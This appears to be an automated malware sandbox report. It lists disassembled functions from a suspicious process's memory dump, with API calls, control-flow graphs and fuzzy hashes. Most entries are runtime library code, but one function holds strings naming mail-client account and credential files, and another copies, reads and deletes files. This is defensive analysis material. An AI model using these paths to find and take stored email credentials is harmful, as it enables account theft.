                      Function 2457AA53 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 363 2457aa53-2457aa6e 364 2457aa80 363->364 365 2457aa70-2457aa7e RtlDecodePointer 363->365 366 2457aa85-2457aa8b 364->366 365->366 367 2457abb2-2457abb5 366->367 368 2457aa91 366->368 371 2457abb7-2457abba 367->371 372 2457ac12 367->372 369 2457aa97-2457aa9a 368->369 370 2457aba6 368->370 374 2457ab47-2457ab4a 369->374 375 2457aaa0 369->375 373 2457aba8-2457abad 370->373 377 2457ac06 371->377 378 2457abbc-2457abbf 371->378 376 2457ac19 372->376 379 2457ac5b-2457ac6a call 24572ada 373->379 385 2457ab9d-2457aba4 374->385 386 2457ab4c-2457ab4f 374->386 380 2457aaa6-2457aaab 375->380 381 2457ab34-2457ab42 375->381 382 2457ac20-2457ac49 376->382 377->372 383 2457abc1-2457abc4 378->383 384 2457abfa 378->384 389 2457ab25-2457ab2f 380->389 390 2457aaad-2457aab0 380->390 381->382 410 2457ac56-2457ac59 382->410 411 2457ac4b-2457ac50 call 24576368 382->411 391 2457abc6-2457abc9 383->391 392 2457abee 383->392 384->377 388 2457ab61-2457ab8f 385->388 393 2457ab94-2457ab9b 386->393 394 2457ab51-2457ab54 386->394 388->410 389->382 397 2457aab2-2457aab5 390->397 398 2457ab1c-2457ab23 390->398 400 2457abe2 391->400 401 2457abcb-2457abd0 391->401 392->384 393->376 394->379 395 2457ab5a 394->395 395->388 406 2457aab7-2457aaba 397->406 407 2457ab0d-2457ab17 397->407 405 2457aac7-2457aaf7 398->405 400->392 402 2457abd2-2457abd5 401->402 403 2457abdb-2457abe0 401->403 402->379 402->403 403->373 405->410 417 2457aafd-2457ab08 call 24576368 405->417 406->379 408 2457aac0 406->408 407->382 408->405 410->379 411->410 417->410
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000011.00000002.2560967148.0000000024571000.00000040.00001000.00020000.00000000.sdmp, Offset: 24570000, based on PE: true
                      • Associated: 00000011.00000002.2560933025.0000000024570000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000011.00000002.2560967148.0000000024586000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_17_2_24570000_wab.jbxd
                      Similarity
                      • API ID: DecodePointer
                      • String ID: acos$asin$exp$log$log10$pow$sqrt
                      • API String ID: 3527080286-3064271455
                      • Opcode ID: 7f45c539e2f51b2af6085eed6848d70d3d0149a9087dd447d752e09c2d1e04ea
                      • Instruction ID: 2b1ea496660d6e10df1fc01bb0df9bfebfc0e704ae1ee1ed46507b93bb10af76
                      • Opcode Fuzzy Hash: 7f45c539e2f51b2af6085eed6848d70d3d0149a9087dd447d752e09c2d1e04ea
                      • Instruction Fuzzy Hash: 66519C70A0460ADBDB028FA4ED889DCBFB5FB49310F1046A5F5C4A7254DB358E64EB15
                      Function 24571CCA Relevance: 13.6, APIs: 9, Instructions: 84fileCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      APIs
                      • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 24571D1B
                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 24571D37
                      • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 24571D4B
                      • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 24571D58
                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 24571D72
                      • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 24571D7D
                      • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 24571D8A
                      Memory Dump Source
                      • Source File: 00000011.00000002.2560967148.0000000024571000.00000040.00001000.00020000.00000000.sdmp, Offset: 24570000, based on PE: true
                      • Associated: 00000011.00000002.2560933025.0000000024570000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000011.00000002.2560967148.0000000024586000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_17_2_24570000_wab.jbxd
                      Similarity
                      • API ID: File$Delete$CloseCopyCreateHandleReadSize
                      • String ID:
                      • API String ID: 1454806937-0
                      • Opcode ID: 42718bcf5c4db807820cdd01f7f18267ad1da5c3f8dac93592464a74e72128b3
                      • Instruction ID: 49b418948ef92fd5682d8d5c95f856f41a94c828f1e3fc58e0e24c52c7b67d1b
                      • Opcode Fuzzy Hash: 42718bcf5c4db807820cdd01f7f18267ad1da5c3f8dac93592464a74e72128b3
                      • Instruction Fuzzy Hash: C6212CB194121CBFE7119BA09C8CEEA7ABCFB58354F0009B5F591E2184F774AE499B70
                      Function 24579492 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 437 24579492-245794ef GetConsoleCP 438 245794f5-24579511 437->438 439 24579632-24579644 call 24572ada 437->439 440 24579513-2457952a 438->440 441 2457952c-2457953d call 24577c19 438->441 444 24579566-24579575 call 245779e6 440->444 449 24579563-24579565 441->449 450 2457953f-24579542 441->450 444->439 451 2457957b-2457959b WideCharToMultiByte 444->451 449->444 452 24579609-24579628 450->452 453 24579548-2457955a call 245779e6 450->453 451->439 454 245795a1-245795b7 WriteFile 451->454 452->439 453->439 460 24579560-24579561 453->460 456 2457962a-24579630 GetLastError 454->456 457 245795b9-245795ca 454->457 456->439 457->439 459 245795cc-245795d0 457->459 461 245795d2-245795f0 WriteFile 459->461 462 245795fe-24579601 459->462 460->451 461->456 463 245795f2-245795f6 461->463 462->438 464 24579607 462->464 463->439 465 245795f8-245795fb 463->465 464->439 465->462
                      APIs
                      • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,24579C07,?,00000000,?,00000000,00000000), ref: 245794D4
                      • __fassign.LIBCMT ref: 2457954F
                      • __fassign.LIBCMT ref: 2457956A
                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 24579590
                      • WriteFile.KERNEL32(?,?,00000000,24579C07,00000000,?,?,?,?,?,?,?,?,?,24579C07,?), ref: 245795AF
                      • WriteFile.KERNEL32(?,?,00000001,24579C07,00000000,?,?,?,?,?,?,?,?,?,24579C07,?), ref: 245795E8
                      Memory Dump Source
                      • Source File: 00000011.00000002.2560967148.0000000024571000.00000040.00001000.00020000.00000000.sdmp, Offset: 24570000, based on PE: true
                      • Associated: 00000011.00000002.2560933025.0000000024570000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000011.00000002.2560967148.0000000024586000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_17_2_24570000_wab.jbxd
                      Similarity
                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                      • String ID:
                      • API String ID: 1324828854-0
                      • Opcode ID: e666a90a43810bef58ba51f6e6a7a4fc878299c542b85ca2dab63d75e62c7014
                      • Instruction ID: a9c37bb2dbc182ff4467d91eb3c73cb279f0a915f588c72cc3411af4677d4b13
                      • Opcode Fuzzy Hash: e666a90a43810bef58ba51f6e6a7a4fc878299c542b85ca2dab63d75e62c7014
                      • Instruction Fuzzy Hash: 555193B1A002499FDB00CFA4D895ADEBBF9FF09310F14456AE995E7281E7709941CB60
                      Function 24573370 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 466 24573370-245733b5 call 24573330 call 245737a7 471 245733b7-245733c9 466->471 472 24573416-24573419 466->472 474 24573439-24573442 471->474 475 245733cb 471->475 473 2457341b-24573428 call 24573790 472->473 472->474 478 2457342d-24573436 call 24573330 473->478 477 245733d0-245733e7 475->477 479 245733fd 477->479 480 245733e9-245733f7 call 24573740 477->480 478->474 481 24573400-24573405 479->481 488 2457340d-24573414 480->488 489 245733f9 480->489 481->477 484 24573407-24573409 481->484 484->474 487 2457340b 484->487 487->478 488->478 490 24573443-2457344c 489->490 491 245733fb 489->491 492 24573486-24573496 call 24573774 490->492 493 2457344e-24573455 490->493 491->481 499 245734aa-245734c6 call 24573330 call 24573758 492->499 500 24573498-245734a7 call 24573790 492->500 493->492 495 24573457-24573466 call 2457bbe0 493->495 501 24573483 495->501 502 24573468-24573480 495->502 500->499 501->492 502->501
                      APIs
                      • _ValidateLocalCookies.LIBCMT ref: 2457339B
                      • ___except_validate_context_record.LIBVCRUNTIME ref: 245733A3
                      • _ValidateLocalCookies.LIBCMT ref: 24573431
                      • __IsNonwritableInCurrentImage.LIBCMT ref: 2457345C
                      • _ValidateLocalCookies.LIBCMT ref: 245734B1
                      Strings
                      Memory Dump Source
                      • Source File: 00000011.00000002.2560967148.0000000024571000.00000040.00001000.00020000.00000000.sdmp, Offset: 24570000, based on PE: true
                      • Associated: 00000011.00000002.2560933025.0000000024570000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000011.00000002.2560967148.0000000024586000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_17_2_24570000_wab.jbxd
                      Similarity
                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                      • String ID: csm
                      • API String ID: 1170836740-1018135373
                      • Opcode ID: 7180aff4c8f6fda51e8f68212e69c3de92007192dd9bb61b15a8ef1eaec99a97
                      • Instruction ID: d0850ee1a9ad8b4b0d4152a34b283108215800a393dc956c61a4a74e3cea9d3d
                      • Opcode Fuzzy Hash: 7180aff4c8f6fda51e8f68212e69c3de92007192dd9bb61b15a8ef1eaec99a97
                      • Instruction Fuzzy Hash: 34410934A40208ABCF05CF68D844A8EBFB6FF85234F0081B5E9946B355D7B1DA05DB91
                      Function 2457925D Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                      Download Yara Rule

                      Control-flow Graph

                      APIs
                        • Part of subcall function 24579221: _free.LIBCMT ref: 2457924A
                      • _free.LIBCMT ref: 245792AB
                        • Part of subcall function 2457571E: HeapFree.KERNEL32(00000000,00000000,?,2457924F,?,00000000,?,00000000,?,24579276,?,00000007,?,?,24577E5A,?), ref: 24575734
                        • Part of subcall function 2457571E: GetLastError.KERNEL32(?,?,2457924F,?,00000000,?,00000000,?,24579276,?,00000007,?,?,24577E5A,?,?), ref: 24575746
                      • _free.LIBCMT ref: 245792B6
                      • _free.LIBCMT ref: 245792C1
                      • _free.LIBCMT ref: 24579315
                      • _free.LIBCMT ref: 24579320
                      • _free.LIBCMT ref: 2457932B
                      • _free.LIBCMT ref: 24579336
                      Memory Dump Source
                      • Source File: 00000011.00000002.2560967148.0000000024571000.00000040.00001000.00020000.00000000.sdmp, Offset: 24570000, based on PE: true
                      • Associated: 00000011.00000002.2560933025.0000000024570000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000011.00000002.2560967148.0000000024586000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_17_2_24570000_wab.jbxd
                      Similarity
                      • API ID: _free$ErrorFreeHeapLast
                      • String ID:
                      • API String ID: 776569668-0
                      • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                      • Instruction ID: 8004b4a44ce76213312b97928b31a94c777e0ded05ca983ea6337b5b907327f4
                      • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                      • Instruction Fuzzy Hash: C8117F31650B08EAF620FBB0DC45FCBBBBD9F98700F400838A7DA76056DA24F504A661
                      Function 24578821 Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                      Download Yara Rule
                      APIs
                      • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,24576FFD,00000000,?,?,?,24578A72,?,?,00000100), ref: 2457887B
                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,24578A72,?,?,00000100,5EFC4D8B,?,?), ref: 24578901
                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 245789FB
                      • __freea.LIBCMT ref: 24578A08
                        • Part of subcall function 245756D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 24575702
                      • __freea.LIBCMT ref: 24578A11
                      • __freea.LIBCMT ref: 24578A36
                      Memory Dump Source
                      • Source File: 00000011.00000002.2560967148.0000000024571000.00000040.00001000.00020000.00000000.sdmp, Offset: 24570000, based on PE: true
                      • Associated: 00000011.00000002.2560933025.0000000024570000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000011.00000002.2560967148.0000000024586000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_17_2_24570000_wab.jbxd
                      Similarity
                      • API ID: ByteCharMultiWide__freea$AllocateHeap
                      • String ID:
                      • API String ID: 1414292761-0
                      • Opcode ID: b861842815f5993d6df4389a944afb190b3ed85e4069d8d5c695e3815cdbfecb
                      • Instruction ID: b506df3bcf09fcc05672befb916cdbaaf2044a4daa77fd7cd173e7931399f54b
                      • Opcode Fuzzy Hash: b861842815f5993d6df4389a944afb190b3ed85e4069d8d5c695e3815cdbfecb
                      • Instruction Fuzzy Hash: B951E47261021AAFEB158E60DC40EBB3BBAEF90660F114A79FD44D6144EB3CDC50E690
                      Function 24571000 Relevance: 9.1, APIs: 6, Instructions: 76stringCOMMON
                      Download Yara Rule
                      APIs
                      • lstrcatW.KERNEL32(?,?), ref: 24571038
                      • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 2457104B
                      • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 24571061
                      • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 24571075
                      • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 24571090
                      • lstrlenW.KERNEL32(?,?,?,00000000), ref: 245710B8
                      Memory Dump Source
                      • Source File: 00000011.00000002.2560967148.0000000024571000.00000040.00001000.00020000.00000000.sdmp, Offset: 24570000, based on PE: true
                      • Associated: 00000011.00000002.2560933025.0000000024570000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000011.00000002.2560967148.0000000024586000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_17_2_24570000_wab.jbxd
                      Similarity
                      • API ID: lstrlen$AttributesFilelstrcat
                      • String ID:
                      • API String ID: 3594823470-0
                      • Opcode ID: b78317c26645ef7865ec3719f339dad4b7390358f4e60470cdb2ba76ef6cc2f9
                      • Instruction ID: 0d1389291851bbba58fab72f766af7f380ef47fc7ce53a88b3ec8fd0b777ebc6
                      • Opcode Fuzzy Hash: b78317c26645ef7865ec3719f339dad4b7390358f4e60470cdb2ba76ef6cc2f9
                      • Instruction Fuzzy Hash: D22183359003289BDF11DB60EC48DDB3778EF84214F1041A6E995A72A9EE30DA89DB40
                      Function 24575AF6 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • GetLastError.KERNEL32(?,?,24576C6C), ref: 24575AFA
                      • _free.LIBCMT ref: 24575B2D
                      • _free.LIBCMT ref: 24575B55
                      • SetLastError.KERNEL32(00000000,?,?,24576C6C), ref: 24575B62
                      • SetLastError.KERNEL32(00000000,?,?,24576C6C), ref: 24575B6E
                      • _abort.LIBCMT ref: 24575B74
                      Memory Dump Source
                      • Source File: 00000011.00000002.2560967148.0000000024571000.00000040.00001000.00020000.00000000.sdmp, Offset: 24570000, based on PE: true
                      • Associated: 00000011.00000002.2560933025.0000000024570000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000011.00000002.2560967148.0000000024586000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_17_2_24570000_wab.jbxd
                      Similarity
                      • API ID: ErrorLast$_free$_abort
                      • String ID:
                      • API String ID: 3160817290-0
                      • Opcode ID: 4cbe510852b2c4f65c461f0a53446a307ca3e735fd63225fe2584b6af6f1f4df
                      • Instruction ID: 4b39aa8e810771b8f66aa16530136fac57f63fd99c68f8b96b77ae37a457aa79
                      • Opcode Fuzzy Hash: 4cbe510852b2c4f65c461f0a53446a307ca3e735fd63225fe2584b6af6f1f4df
                      • Instruction Fuzzy Hash: 14F0A432504508EBE34216347C48E2A2A79DBE1971B240134F9DAA6985FE25C506E165
                      Function 245711EA Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 90COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 24571E89: lstrlenW.KERNEL32(?,?,?,?,?,245710DF,?,?,?,00000000), ref: 24571E9A
                        • Part of subcall function 24571E89: lstrcatW.KERNEL32(?,?), ref: 24571EAC
                        • Part of subcall function 24571E89: lstrlenW.KERNEL32(?,?,245710DF,?,?,?,00000000), ref: 24571EB3
                        • Part of subcall function 24571E89: lstrlenW.KERNEL32(?,?,245710DF,?,?,?,00000000), ref: 24571EC8
                        • Part of subcall function 24571E89: lstrcatW.KERNEL32(?,245710DF), ref: 24571ED3
                      • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 2457122A
                        • Part of subcall function 2457173A: _strlen.LIBCMT ref: 24571855
                        • Part of subcall function 2457173A: _strlen.LIBCMT ref: 24571869
                      Strings
                      Memory Dump Source
                      • Source File: 00000011.00000002.2560967148.0000000024571000.00000040.00001000.00020000.00000000.sdmp, Offset: 24570000, based on PE: true
                      • Associated: 00000011.00000002.2560933025.0000000024570000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000011.00000002.2560967148.0000000024586000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_17_2_24570000_wab.jbxd
                      Similarity
                      • API ID: lstrlen$_strlenlstrcat$AttributesFile
                      • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                      • API String ID: 4036392271-1520055953
                      • Opcode ID: b2dda502b04e251c00eeb89ec041aa6e46e4ea8b174dfdd7363ebf9e1b5b7e6b
                      • Instruction ID: 3e44a54a9cc66a52b9b1d220117b83ba88be6b8dcbc682235da83afbca9adc3a
                      • Opcode Fuzzy Hash: b2dda502b04e251c00eeb89ec041aa6e46e4ea8b174dfdd7363ebf9e1b5b7e6b
                      • Instruction Fuzzy Hash: A621D7B9E102086BF7119790EC91FED7339EF90715F001556FA44EB2D8EAB15E80C758
                      Function 24574B39 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,24574AEA,?,?,24574A8A,?,24582238,?,24574BBD,00000000,00000000), ref: 24574B59
                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 24574B6C
                      • FreeLibrary.KERNEL32(00000000,?,?,?,24574AEA,?,?,24574A8A,?,24582238,?,24574BBD,00000000,00000000,00000001,24572082), ref: 24574B8F
                      Strings
                      Memory Dump Source
                      • Source File: 00000011.00000002.2560967148.0000000024571000.00000040.00001000.00020000.00000000.sdmp, Offset: 24570000, based on PE: true
                      • Associated: 00000011.00000002.2560933025.0000000024570000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000011.00000002.2560967148.0000000024586000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_17_2_24570000_wab.jbxd
                      Similarity
                      • API ID: AddressFreeHandleLibraryModuleProc
                      • String ID: CorExitProcess$mscoree.dll
                      • API String ID: 4061214504-1276376045
                      • Opcode ID: e00ff39a584b8bf39b36ac89d991b6d9e31fb28ad7d68882700aa297ef48009f
                      • Instruction ID: e4323fb84e8057f7c64ee79eecf9285f33c311a430778f771dd30b011d7603f9
                      • Opcode Fuzzy Hash: e00ff39a584b8bf39b36ac89d991b6d9e31fb28ad7d68882700aa297ef48009f
                      • Instruction Fuzzy Hash: A9F04F31901118BFDB119FA1DC48F9DBFB9FF45351F004174F989B6190EB399945DA90
                      Function 245715DA Relevance: 7.6, APIs: 5, Instructions: 84stringCOMMON
                      Download Yara Rule
                      APIs
                      • _strlen.LIBCMT ref: 24571607
                      • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,2457190E,?,?,00000000,?,00000000), ref: 24571643
                      • lstrcatW.KERNEL32(?,?), ref: 2457165A
                      • lstrlenW.KERNEL32(?,?,?,?,?,2457190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 24571661
                      • lstrcatW.KERNEL32(00001008,?), ref: 24571686
                      Memory Dump Source
                      • Source File: 00000011.00000002.2560967148.0000000024571000.00000040.00001000.00020000.00000000.sdmp, Offset: 24570000, based on PE: true
                      • Associated: 00000011.00000002.2560933025.0000000024570000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000011.00000002.2560967148.0000000024586000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_17_2_24570000_wab.jbxd
                      Similarity
                      • API ID: lstrcatlstrlen$_strlen
                      • String ID:
                      • API String ID: 3802368996-0
                      • Opcode ID: e726ffb66f9a3003b1ea81c433d3f0a9038cd0ee3fd50cbddc875244daec38d8
                      • Instruction ID: 8ba989805d6b4aa4a426ed8b8a22ab59a4a9b0750d0c47e30f366db01c9f084d
                      • Opcode Fuzzy Hash: e726ffb66f9a3003b1ea81c433d3f0a9038cd0ee3fd50cbddc875244daec38d8
                      • Instruction Fuzzy Hash: 9121DA36900204BBD705DB54EC84EEE7BBCEF89710F14403AE544BB289EB34E945E7A5
                      Function 24577153 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                      Download Yara Rule
                      APIs
                      • GetEnvironmentStringsW.KERNEL32 ref: 2457715C
                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 2457717F
                        • Part of subcall function 245756D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 24575702
                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 245771A5
                      • _free.LIBCMT ref: 245771B8
                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 245771C7
                      Memory Dump Source
                      • Source File: 00000011.00000002.2560967148.0000000024571000.00000040.00001000.00020000.00000000.sdmp, Offset: 24570000, based on PE: true
                      • Associated: 00000011.00000002.2560933025.0000000024570000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000011.00000002.2560967148.0000000024586000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_17_2_24570000_wab.jbxd
                      Similarity
                      • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                      • String ID:
                      • API String ID: 336800556-0
                      • Opcode ID: 5248ccca7e7d1e4b80b59c81c13c9306b1908ffe5e4da422a91406771d9d8fb7
                      • Instruction ID: c525bebfa871745a827998cd117cd464d252313415044ca0f77261f050b82fdb
                      • Opcode Fuzzy Hash: 5248ccca7e7d1e4b80b59c81c13c9306b1908ffe5e4da422a91406771d9d8fb7
                      • Instruction Fuzzy Hash: D6018472602A157B27111AB67C88D7B6E7DEBC2AE03100179FD84D7244FA649C02A2B4
                      Function 24575B7A Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • GetLastError.KERNEL32(00000000,?,00000000,2457636D,24575713,00000000,?,24572249,?,?,24571D66,00000000,?,?,00000000), ref: 24575B7F
                      • _free.LIBCMT ref: 24575BB4
                      • _free.LIBCMT ref: 24575BDB
                      • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 24575BE8
                      • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 24575BF1
                      Memory Dump Source
                      • Source File: 00000011.00000002.2560967148.0000000024571000.00000040.00001000.00020000.00000000.sdmp, Offset: 24570000, based on PE: true
                      • Associated: 00000011.00000002.2560933025.0000000024570000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000011.00000002.2560967148.0000000024586000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_17_2_24570000_wab.jbxd
                      Similarity
                      • API ID: ErrorLast$_free
                      • String ID:
                      • API String ID: 3170660625-0
                      • Opcode ID: 03b5d398e04abb92171c0999f069562335208894f3d0c84dba2842b8fbe9120a
                      • Instruction ID: 7726e4f47071e7180fd1ea906610d1ba56121edad1b0edeb245d29013210bbb0
                      • Opcode Fuzzy Hash: 03b5d398e04abb92171c0999f069562335208894f3d0c84dba2842b8fbe9120a
                      • Instruction Fuzzy Hash: D001F972204609EBE30316342C84D2B2A79EBD15707100078FDDFA6585FF64C906E124
                      Function 24571E89 Relevance: 7.5, APIs: 5, Instructions: 41stringCOMMON
                      Download Yara Rule
                      APIs
                      • lstrlenW.KERNEL32(?,?,?,?,?,245710DF,?,?,?,00000000), ref: 24571E9A
                      • lstrcatW.KERNEL32(?,?), ref: 24571EAC
                      • lstrlenW.KERNEL32(?,?,245710DF,?,?,?,00000000), ref: 24571EB3
                      • lstrlenW.KERNEL32(?,?,245710DF,?,?,?,00000000), ref: 24571EC8
                      • lstrcatW.KERNEL32(?,245710DF), ref: 24571ED3
                      Memory Dump Source
                      • Source File: 00000011.00000002.2560967148.0000000024571000.00000040.00001000.00020000.00000000.sdmp, Offset: 24570000, based on PE: true
                      • Associated: 00000011.00000002.2560933025.0000000024570000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000011.00000002.2560967148.0000000024586000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_17_2_24570000_wab.jbxd
                      Similarity
                      • API ID: lstrlen$lstrcat
                      • String ID:
                      • API String ID: 493641738-0
                      • Opcode ID: 6ab27bdec3be0afa123fa7f8c8dee9d7f40d137ab1ffc0d9a51a8e5d3a8b275e
                      • Instruction ID: 47da93a1dc9b9ad8dafe0d4ae350f2f88829eaa4d051c756a731ce4f9987bd8b
                      • Opcode Fuzzy Hash: 6ab27bdec3be0afa123fa7f8c8dee9d7f40d137ab1ffc0d9a51a8e5d3a8b275e
                      • Instruction Fuzzy Hash: 6BF089261001107AE6212729BC85E7F7F7CFFC5A60B040029FA4897290FB54584692B5
                      Function 245791B8 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • _free.LIBCMT ref: 245791D0
                        • Part of subcall function 2457571E: HeapFree.KERNEL32(00000000,00000000,?,2457924F,?,00000000,?,00000000,?,24579276,?,00000007,?,?,24577E5A,?), ref: 24575734
                        • Part of subcall function 2457571E: GetLastError.KERNEL32(?,?,2457924F,?,00000000,?,00000000,?,24579276,?,00000007,?,?,24577E5A,?,?), ref: 24575746
                      • _free.LIBCMT ref: 245791E2
                      • _free.LIBCMT ref: 245791F4
                      • _free.LIBCMT ref: 24579206
                      • _free.LIBCMT ref: 24579218
                      Memory Dump Source
                      • Source File: 00000011.00000002.2560967148.0000000024571000.00000040.00001000.00020000.00000000.sdmp, Offset: 24570000, based on PE: true
                      • Associated: 00000011.00000002.2560933025.0000000024570000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000011.00000002.2560967148.0000000024586000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_17_2_24570000_wab.jbxd
                      Similarity
                      • API ID: _free$ErrorFreeHeapLast
                      • String ID:
                      • API String ID: 776569668-0
                      • Opcode ID: 41df7cf1b976dda6e9e13fc56b42f81f14988484857fda2720c3c0d36e8ae434
                      • Instruction ID: 2083bea8307f4c696d99d8c981334d1621e771a105907ce73618818088c9cb36
                      • Opcode Fuzzy Hash: 41df7cf1b976dda6e9e13fc56b42f81f14988484857fda2720c3c0d36e8ae434
                      • Instruction Fuzzy Hash: 9CF06271524644A7A610DB58E5C4C0E7FF9FB943907501829FACAE7904CB35F8C09A64
                      Function 24575351 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                      Download Yara Rule
                      APIs
                      • _free.LIBCMT ref: 2457536F
                        • Part of subcall function 2457571E: HeapFree.KERNEL32(00000000,00000000,?,2457924F,?,00000000,?,00000000,?,24579276,?,00000007,?,?,24577E5A,?), ref: 24575734
                        • Part of subcall function 2457571E: GetLastError.KERNEL32(?,?,2457924F,?,00000000,?,00000000,?,24579276,?,00000007,?,?,24577E5A,?,?), ref: 24575746
                      • _free.LIBCMT ref: 24575381
                      • _free.LIBCMT ref: 24575394
                      • _free.LIBCMT ref: 245753A5
                      • _free.LIBCMT ref: 245753B6
                      Memory Dump Source
                      • Source File: 00000011.00000002.2560967148.0000000024571000.00000040.00001000.00020000.00000000.sdmp, Offset: 24570000, based on PE: true
                      • Associated: 00000011.00000002.2560933025.0000000024570000.00000004.00001000.00020000.00000000.sdmpDownload File
